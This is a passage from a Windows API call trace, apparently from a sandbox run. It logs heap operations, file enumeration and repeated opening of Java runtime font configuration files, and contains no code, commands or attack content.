hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0096.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeba, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fontconfig.bfc", cAlternateFileName="FONTCO~1.BFC")) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0096.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.525] AreFileApisANSI () returned 1 [0096.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc", lpUsedDefaultChar=0x0) returned 54 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.525] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0096.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0096.526] AreFileApisANSI () returned 1 [0096.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76110 [0096.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76110, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 54 [0096.526] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.527] GetFileType (hFile=0x360) returned 0x1 [0096.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0096.527] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.527] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.527] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.527] CloseHandle (hObject=0x360) returned 1 [0096.527] AreFileApisANSI () returned 1 [0096.527] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75fa8 [0096.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 54 [0096.528] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.528] GetFileType (hFile=0x360) returned 0x1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0096.528] CloseHandle (hObject=0x360) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.528] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.529] AreFileApisANSI () returned 1 [0096.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x76278 [0096.529] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc") returned 54 [0096.529] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.bfc" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.bfc"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xeba)) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0096.529] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0096.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.529] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.529] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c0476d, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c0476d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2948, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fontconfig.properties.src", cAlternateFileName="FONTCO~1.SRC")) returned 1 [0096.529] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b80 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.530] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0096.530] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0096.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.530] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0096.531] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.531] AreFileApisANSI () returned 1 [0096.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src", lpUsedDefaultChar=0x0) returned 65 [0096.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0096.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.531] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0096.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0096.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0096.531] AreFileApisANSI () returned 1 [0096.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0096.531] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82b98 [0096.531] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82b98, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 65 [0096.531] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.532] GetFileType (hFile=0x360) returned 0x1 [0096.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82b98 | out: hHeap=0x20000) returned 1 [0096.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0096.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0096.532] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0096.532] CloseHandle (hObject=0x360) returned 1 [0096.533] AreFileApisANSI () returned 1 [0096.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82688 [0096.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82688, cchWideChar=65 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src") returned 65 [0096.533] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\fontconfig.properties.src" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\fontconfig.properties.src"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0096.533] GetFileType (hFile=0x360) returned 0x1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82688 | out: hHeap=0x20000) returned 1 [0096.533] CloseHandle (hObject=0x360) returned 1 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0096.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0096.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53520 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53520 | out: hHeap=0x20000) returned 1 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0096.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0096.534] AreFileApisANSI () returned 1 [0096.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0096.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x82) returned 0x82838 [0096.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d2c0, cbMultiByte=-1, lpWideCharStr=0x82838, 